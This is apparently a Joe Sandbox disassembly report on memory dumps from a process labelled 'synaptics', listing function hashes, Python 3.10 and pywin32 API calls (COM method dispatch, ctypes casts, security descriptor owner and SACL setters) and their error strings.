                                                                                                                                                                                                              • Opcode ID: 0f90546ba5ccf114de43b32e3c33a844981229c4ae497b0d1eda5afa509953ae
                                                                                                                                                                                                              • Instruction ID: 9ff084c0e647bbf2ca73c2835a32860b1f49427a5f7faf4e580df06d4226d83d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f90546ba5ccf114de43b32e3c33a844981229c4ae497b0d1eda5afa509953ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7491E0717056019FCB00CBDCDD80B9A77E8EF05328B1486A5EC2997A52DB32E852CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyTuple_GetItem.PYTHON310(?,00000000), ref: 6C0A5AC9
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,COM method call without VTable), ref: 6C0A5AE4
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B56F8), ref: 6C0A5B06
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Expected a COM this pointer as first argument), ref: 6C0A5B1F
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A5BB8
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,this function takes %d argument%s (%d given),?,6C0B1367,?), ref: 6C0A5BE6
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A5C0C
                                                                                                                                                                                                              • PyObject_CallFunctionObjArgs.PYTHON310(?,00000000,?,00000000,00000000), ref: 6C0A5C65
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A5C7E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • native com method call without 'this' parameter, xrefs: 6C0A5AD8
                                                                                                                                                                                                              • NULL COM pointer access, xrefs: 6C0A5BF8
                                                                                                                                                                                                              • this function takes %d argument%s (%d given), xrefs: 6C0A5C2E
                                                                                                                                                                                                              • COM method call without VTable, xrefs: 6C0A5B4F
                                                                                                                                                                                                              • this function takes at least %d argument%s (%d given), xrefs: 6C0A5BDA
                                                                                                                                                                                                              • Expected a COM this pointer as first argument, xrefs: 6C0A5B18
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocErr_$String$ArgsCallFormatFunctionItemObject_SubtypeTuple_Type_
                                                                                                                                                                                                              • String ID: COM method call without VTable$Expected a COM this pointer as first argument$NULL COM pointer access$native com method call without 'this' parameter$this function takes %d argument%s (%d given)$this function takes at least %d argument%s (%d given)
                                                                                                                                                                                                              • API String ID: 1084382671-1981512665
                                                                                                                                                                                                              • Opcode ID: aee61140c831eec797ab3ceec3492738b9fef44e7bae70eefad27a9c235a8118
                                                                                                                                                                                                              • Instruction ID: 2225b626a304abcfd34fd508f8e2396fb3b0866f97a415ec16202eb95b110af7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aee61140c831eec797ab3ceec3492738b9fef44e7bae70eefad27a9c235a8118
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C81AE75B04605AFCB04CFD9C881BAAB7F4FF44328F144569E919A7A41E732E911CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B57F8), ref: 6C0A7CA2
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B5048), ref: 6C0A7CC3
                                                                                                                                                                                                              • PyUnicode_AsUTF8.PYTHON310(?), ref: 6C0A7CFC
                                                                                                                                                                                                              • strchr.VCRUNTIME140(sPzUZXO,00000000), ref: 6C0A7D0B
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,cast() argument 2 must be a pointer type, not %s,?), ref: 6C0A7D36
                                                                                                                                                                                                              • PyThreadState_Get.PYTHON310 ref: 6C0A7D46
                                                                                                                                                                                                              • _Py_CheckFunctionResult.PYTHON310(00000000,?,00000000,00000000), ref: 6C0A7D72
                                                                                                                                                                                                              • _PyObject_MakeTpCall.PYTHON310(00000000,?,00000000,00000000,00000000), ref: 6C0A7D85
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B56F8), ref: 6C0A7DAB
                                                                                                                                                                                                              • PyDict_New.PYTHON310 ref: 6C0A7DE5
                                                                                                                                                                                                              • PyLong_FromVoidPtr.PYTHON310(?), ref: 6C0A7E0E
                                                                                                                                                                                                              • PyDict_SetItem.PYTHON310(?,00000000,?), ref: 6C0A7E22
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A7E33
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • sPzUZXO, xrefs: 6C0A7D06
                                                                                                                                                                                                              • cast() argument 2 must be a pointer type, not %s, xrefs: 6C0A7D2F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SubtypeType_$Dict_$CallCheckDeallocErr_FormatFromFunctionItemLong_MakeObject_ResultState_ThreadUnicode_Voidstrchr
                                                                                                                                                                                                              • String ID: cast() argument 2 must be a pointer type, not %s$sPzUZXO
                                                                                                                                                                                                              • API String ID: 476133444-1038790478
                                                                                                                                                                                                              • Opcode ID: f821009ad62ee812d87561ecefd9bc4f07448336491e75146fb5c2ad0e4cee06
                                                                                                                                                                                                              • Instruction ID: b13ecf6a458bbe8e03d42f9a44880f0b542c443cca747a1a1ace6baae99bb0c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f821009ad62ee812d87561ecefd9bc4f07448336491e75146fb5c2ad0e4cee06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E51E9703056019FDB04CBE8DD84B6673F9AF0572DF148A24E92AD7A56DB36E802C754
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,iOi:SetSacl,?,?,?), ref: 6BF46B4E
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PyACL object), ref: 6BF46B80
                                                                                                                                                                                                              • ?_MakeAbsoluteSD@@YAHPAXPAPAX@Z.PYWINTYPES310(?,?), ref: 6BF46BA2
                                                                                                                                                                                                              • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 6BF46BC3
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SetSecurityDescriptorSacl,00000000), ref: 6BF46BD3
                                                                                                                                                                                                              • ?SetSD@PySECURITY_DESCRIPTOR@@QAEHPAX@Z.PYWINTYPES310(?), ref: 6BF46BF5
                                                                                                                                                                                                                • Part of subcall function 6BF468D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF468DF
                                                                                                                                                                                                                • Part of subcall function 6BF468D0: GetSecurityDescriptorLength.ADVAPI32(?), ref: 6BF468ED
                                                                                                                                                                                                              • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 6BF46C18
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46C2B
                                                                                                                                                                                                              • GetSecurityDescriptorGroup.ADVAPI32(?,?,?), ref: 6BF46C3B
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46C4E
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46C5B
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF46C66
                                                                                                                                                                                                                • Part of subcall function 6BF46540: IsValidSecurityDescriptor.ADVAPI32(00000000,?,00000000,00000000,6BF47490), ref: 6BF46548
                                                                                                                                                                                                                • Part of subcall function 6BF46540: PyErr_SetString.PYTHON310(6C7E9C54,Invalid Security descriptor,?,00000000,00000000,6BF47490), ref: 6BF4655E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DescriptorSecurityfree$Err_String$AbsoluteArg_Error@@GroupLengthMakeOwnerParseSaclTupleU_object@@ValidWin_
                                                                                                                                                                                                              • String ID: SetSecurityDescriptorSacl$The object is not a PyACL object$iOi:SetSacl
                                                                                                                                                                                                              • API String ID: 3909321686-1973599164
                                                                                                                                                                                                              • Opcode ID: d40754ef22e8282d93a477c632dd31dd3cadc8a650e0239f2fc439add2fb4f3d
                                                                                                                                                                                                              • Instruction ID: 4515ed407ecd3b750d058564190e7c4210eafa240a2951a95029ef5ee0803431
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d40754ef22e8282d93a477c632dd31dd3cadc8a650e0239f2fc439add2fb4f3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B41C373614205ABD700EF64DC80E6B7BECEF88645F0405A8F955D2133EB29EA1887B3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,Oi:SetSecurityDescriptorOwner,?,?), ref: 6BF46D21
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PySID object), ref: 6BF46D55
                                                                                                                                                                                                              • ?_MakeAbsoluteSD@@YAHPAXPAPAX@Z.PYWINTYPES310(?,?), ref: 6BF46D85
                                                                                                                                                                                                              • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 6BF46DA6
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46DB9
                                                                                                                                                                                                              • SetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 6BF46DC7
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SetSecurityDescriptorOwner,00000000), ref: 6BF46DD7
                                                                                                                                                                                                              • ?SetSD@PySECURITY_DESCRIPTOR@@QAEHPAX@Z.PYWINTYPES310(?), ref: 6BF46DF9
                                                                                                                                                                                                                • Part of subcall function 6BF468D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF468DF
                                                                                                                                                                                                                • Part of subcall function 6BF468D0: GetSecurityDescriptorLength.ADVAPI32(?), ref: 6BF468ED
                                                                                                                                                                                                              • GetSecurityDescriptorGroup.ADVAPI32(?,?,?), ref: 6BF46E24
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46E37
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46E3D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF46E47
                                                                                                                                                                                                                • Part of subcall function 6BF46540: IsValidSecurityDescriptor.ADVAPI32(00000000,?,00000000,00000000,6BF47490), ref: 6BF46548
                                                                                                                                                                                                                • Part of subcall function 6BF46540: PyErr_SetString.PYTHON310(6C7E9C54,Invalid Security descriptor,?,00000000,00000000,6BF47490), ref: 6BF4655E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Oi:SetSecurityDescriptorOwner, xrefs: 6BF46D18
                                                                                                                                                                                                              • The object is not a PySID object, xrefs: 6BF46D4E
                                                                                                                                                                                                              • SetSecurityDescriptorOwner, xrefs: 6BF46DD2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DescriptorSecurityfree$Err_OwnerString$AbsoluteArg_Error@@GroupLengthMakeParseTupleU_object@@ValidWin_
                                                                                                                                                                                                              • String ID: Oi:SetSecurityDescriptorOwner$SetSecurityDescriptorOwner$The object is not a PySID object
                                                                                                                                                                                                              • API String ID: 2874284334-2833774516
                                                                                                                                                                                                              • Opcode ID: 1886745ceef3a1a4736f3b93a43c9b9a94c1f575b0471904f6edfb405ea2cb36
                                                                                                                                                                                                              • Instruction ID: 0ad321fbf34673e9c4a1da3cdf2d17c60b55aa410e1cbd4c99c0921e06422a88
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1886745ceef3a1a4736f3b93a43c9b9a94c1f575b0471904f6edfb405ea2cb36
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F4181B2614301ABE700EF64CC84A6B7BE8EF85604F4404ACF855D3223D739EA18D7A7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsValidSecurityDescriptor.ADVAPI32(00000000,?,00000000,00000000,6BF47490), ref: 6BF46548
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,Invalid Security descriptor,?,00000000,00000000,6BF47490), ref: 6BF4655E
                                                                                                                                                                                                              • GetSecurityDescriptorLength.ADVAPI32(00000000,?,?,00000000,00000000,6BF47490), ref: 6BF4656F
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00000000,00000000,6BF47490), ref: 6BF4657C
                                                                                                                                                                                                              • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 6BF46592
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF465A2
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(MakeSelfRelativeSD,00000000), ref: 6BF465BA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DescriptorSecurity$Err_Error@@LengthMakeRelativeSelfStringU_object@@ValidWin_freemalloc
                                                                                                                                                                                                              • String ID: Invalid Security descriptor$MakeSelfRelativeSD$Unable to allocate %d bytes
                                                                                                                                                                                                              • API String ID: 3254153865-2210018374
                                                                                                                                                                                                              • Opcode ID: 974b60353ba6e1cfbf0e70c017c040d190a0cf5d496a6edd5c20478752b64970
                                                                                                                                                                                                              • Instruction ID: 3404031ab810b8fae9735150f98479c34e98e77235a52e4b8811c4ef57a36f33
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 974b60353ba6e1cfbf0e70c017c040d190a0cf5d496a6edd5c20478752b64970
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3921C9773241016FFB04AF78EC48B56BBA4EBA275AF10047EF545C1127EB35C5289762
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Array does not support item deletion), ref: 6C0A670A
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EA174,invalid index), ref: 6C0A69DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • invalid index, xrefs: 6C0A69D3
                                                                                                                                                                                                              • expected %s instance, got %s, xrefs: 6C0A68A0
                                                                                                                                                                                                              • (%s) , xrefs: 6C0A682A
                                                                                                                                                                                                              • not a ctype instance, xrefs: 6C0A6792
                                                                                                                                                                                                              • Array does not support item deletion, xrefs: 6C0A6703
                                                                                                                                                                                                              • incompatible types, %s instance instead of %s instance, xrefs: 6C0A69AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String
                                                                                                                                                                                                              • String ID: (%s) $Array does not support item deletion$expected %s instance, got %s$incompatible types, %s instance instead of %s instance$invalid index$not a ctype instance
                                                                                                                                                                                                              • API String ID: 1450464846-562294949
                                                                                                                                                                                                              • Opcode ID: 7c7adead57f0974815cae37379dc1f96e9989070f2fa0b55f67ae73195293d8a
                                                                                                                                                                                                              • Instruction ID: e556647601ab2774df0d2fb5e16e73840c8c5f4280798c776cd443471d45a1c1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c7adead57f0974815cae37379dc1f96e9989070f2fa0b55f67ae73195293d8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77811271705202ABCB04CFDCDD80B9A73F8EF45228B144665E82DDBB52DB32E912C795
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyTuple_GetItem.PYTHON310(?,00000002), ref: 6C0A1F8F
                                                                                                                                                                                                              • PyThreadState_Get.PYTHON310 ref: 6C0A1FA2
                                                                                                                                                                                                              • _Py_CheckFunctionResult.PYTHON310(00000000,6C0B6110,00000000,00000000), ref: 6C0A1FDC
                                                                                                                                                                                                              • _PyObject_MakeTpCall.PYTHON310(00000000,6C0B6110,00000000,00000000,00000000), ref: 6C0A1FF3
                                                                                                                                                                                                              • _PyDict_GetItemIdWithError.PYTHON310 ref: 6C0A2051
                                                                                                                                                                                                              • PyMem_Malloc.PYTHON310(6C0B0473), ref: 6C0A20DD
                                                                                                                                                                                                              • PyErr_NoMemory.PYTHON310(?,00000000), ref: 6C0A20EC
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A214A
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310(00000000), ref: 6C0A215C
                                                                                                                                                                                                              • PyDict_Update.PYTHON310(00000000,?), ref: 6C0A218C
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A21A5
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A21B0
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A21D0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Dict_Err_Item$CallCheckErrorFunctionMakeMallocMem_MemoryObject_OccurredResultState_ThreadTuple_UpdateWith
                                                                                                                                                                                                              • String ID: 0bal
                                                                                                                                                                                                              • API String ID: 1932651968-2732478310
                                                                                                                                                                                                              • Opcode ID: f0b366655ce4c241799422aa038cb29c24c4a7ccfda82827acd794ad6d5a95c1
                                                                                                                                                                                                              • Instruction ID: ac7f01871576eaf2f5d6ddbc49458cafceb7119ebc0f17c57cd58d665d7d3224
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0b366655ce4c241799422aa038cb29c24c4a7ccfda82827acd794ad6d5a95c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 846128B1A042009BDB04CFE5C949B9977F5AF46B18F144668ED1EAB643DB32D407C794
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyDict_GetItemIdWithError.PYTHON310(00000000,6C0B64B4), ref: 6C0A6071
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A6083
                                                                                                                                                                                                              • PySequence_GetItem.PYTHON310(00000000,00000000), ref: 6C0A60C4
                                                                                                                                                                                                              • PySequence_GetItem.PYTHON310(00000000,00000000), ref: 6C0A60DA
                                                                                                                                                                                                              • PyDict_Contains.PYTHON310(?,00000000), ref: 6C0A60FE
                                                                                                                                                                                                              • PyObject_SetAttr.PYTHON310(?,00000000,?), ref: 6C0A6113
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A612B
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A613E
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,duplicate values for field %R,00000000), ref: 6C0A6172
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A6187
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A619A
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A61B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Item$Dict_Err_Sequence_$AttrContainsErrorFormatObject_OccurredWith
                                                                                                                                                                                                              • String ID: 04Ul$duplicate values for field %R
                                                                                                                                                                                                              • API String ID: 1919794741-2214219946
                                                                                                                                                                                                              • Opcode ID: c11564e96955366f2077f404175bc1bcc2711fbc5bb6be153f03c9e3802a67a5
                                                                                                                                                                                                              • Instruction ID: 9528e315fbbcd993090bb8372e564930a087939d77b0606878676719421d6fba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c11564e96955366f2077f404175bc1bcc2711fbc5bb6be153f03c9e3802a67a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E511671A046058BCB00CFDDCD41A9EBBF4FF41738F184765E829E7682DB31A9568B81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(?), ref: 6C0A315A
                                                                                                                                                                                                              • PyUnicode_InternFromString.PYTHON310(_be), ref: 6C0A317B
                                                                                                                                                                                                              • PyUnicode_Concat.PYTHON310(?,046766A0), ref: 6C0A3191
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A31A8
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A3205
                                                                                                                                                                                                              • PyThreadState_Get.PYTHON310 ref: 6C0A320E
                                                                                                                                                                                                              • _Py_CheckFunctionResult.PYTHON310(00000000,6C0B6110,00000000,00000000), ref: 6C0A3248
                                                                                                                                                                                                              • _PyObject_MakeTpCall.PYTHON310(00000000,6C0B6110,00000000,00000000,00000000), ref: 6C0A325F
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A3274
                                                                                                                                                                                                              • PyDict_Update.PYTHON310(00000000,?), ref: 6C0A32CB
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A32DE
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A32E9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Unicode_$CallCheckConcatDict_FromFunctionInternMakeObject_ResultState_StringThreadTuple_Update
                                                                                                                                                                                                              • String ID: _be
                                                                                                                                                                                                              • API String ID: 2122106316-4071763053
                                                                                                                                                                                                              • Opcode ID: d063e2f952401a0358723bd9cc28d8a1ebf77ed1b70a73fed62de374d46ebc22
                                                                                                                                                                                                              • Instruction ID: fc197f23eb9cef7c6c140b3cd2b897f458651863d122ceb5f7486c60b148e357
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d063e2f952401a0358723bd9cc28d8a1ebf77ed1b70a73fed62de374d46ebc22
